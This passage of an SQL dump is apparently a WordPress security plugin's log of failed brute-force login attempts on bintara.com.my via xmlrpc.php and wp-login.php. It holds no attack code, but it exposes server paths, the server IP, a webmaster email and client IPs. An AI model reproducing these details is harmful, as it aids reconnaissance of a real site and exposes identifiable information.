Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"41396\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEp6H-mRYMgL5SYt2EWFwAAAUk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568745960.8076\";s:12:\"REQUEST_TIME\";s:10:\"1568745960\";}}','notice','2019-09-17 18:46:02','2019-09-17 18:46:01',18257720,19555920,'https://bintara.com.my/xmlrpc.php',1,0,'119.28.180.62'),(24692,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"208.87.96.179\";s:11:\"REMOTE_PORT\";s:5:\"45450\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEreAzFGGCvSlQvICa7aAAAARM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568746361.6305\";s:12:\"REQUEST_TIME\";s:10:\"1568746361\";}}','notice','2019-09-17 18:52:43','2019-09-17 18:52:42',18257792,19552888,'https://bintara.com.my/xmlrpc.php',1,0,'208.87.96.179'),(24693,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"134.209.5.43\";s:11:\"REMOTE_PORT\";s:5:\"41314\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEs2AXSR6kyIDDt@BChlQAAAAs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568746712.9305\";s:12:\"REQUEST_TIME\";s:10:\"1568746712\";}}','notice','2019-09-17 18:58:34','2019-09-17 18:58:33',17740280,19231144,'https://bintara.com.my/wp-login.php',1,0,'134.209.5.43'),(24694,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"134.209.5.43\";s:11:\"REMOTE_PORT\";s:5:\"41792\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEs2@2YXtrkXKCdhUxr7AAAAIo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568746715.7381\";s:12:\"REQUEST_TIME\";s:10:\"1568746715\";}}','notice','2019-09-17 18:58:37','2019-09-17 18:58:36',18256656,19555560,'https://bintara.com.my/xmlrpc.php',1,0,'134.209.5.43'),(24695,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.213.19.83\";s:11:\"REMOTE_PORT\";s:5:\"58966\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEs8svSqvOOv2GhWJhT6QAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568746738.9452\";s:12:\"REQUEST_TIME\";s:10:\"1568746738\";}}','notice','2019-09-17 18:59:00','2019-09-17 18:58:59',17739648,19231280,'https://bintara.com.my/wp-login.php',1,0,'188.213.19.83'),(24696,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.213.19.83\";s:11:\"REMOTE_PORT\";s:5:\"59768\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEs9svSqvOOv2GhWJhT7gAAANI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568746742.4947\";s:12:\"REQUEST_TIME\";s:10:\"1568746742\";}}','notice','2019-09-17 18:59:05','2019-09-17 18:59:02',18257200,19555232,'https://bintara.com.my/xmlrpc.php',1,0,'188.213.19.83'),(24697,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.165.245\";s:11:\"REMOTE_PORT\";s:5:\"41960\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEuoAzFGGCvSlQvICa7mAAAAQw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568747168.4397\";s:12:\"REQUEST_TIME\";s:10:\"1568747168\";}}','notice','2019-09-17 19:06:09','2019-09-17 19:06:08',17740088,19230904,'https://bintara.com.my/wp-login.php',1,0,'50.63.165.245'),(24698,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.165.245\";s:11:\"REMOTE_PORT\";s:5:\"44398\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEurcvSqvOOv2GhWJhU7AAAANA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568747181.4581\";s:12:\"REQUEST_TIME\";s:10:\"1568747181\";}}','notice','2019-09-17 19:06:22','2019-09-17 19:06:21',18256992,19555784,'https://bintara.com.my/xmlrpc.php',1,0,'50.63.165.245'),(24699,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"216.57.228.2\";s:11:\"REMOTE_PORT\";s:5:\"45988\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEv2svSqvOOv2GhWJhVlwAAANQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568747482.2508\";s:12:\"REQUEST_TIME\";s:10:\"1568747482\";}}','notice','2019-09-17 19:11:23','2019-09-17 19:11:22',17740128,19232384,'https://bintara.com.my/wp-login.php',1,0,'216.57.228.2'),(24700,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 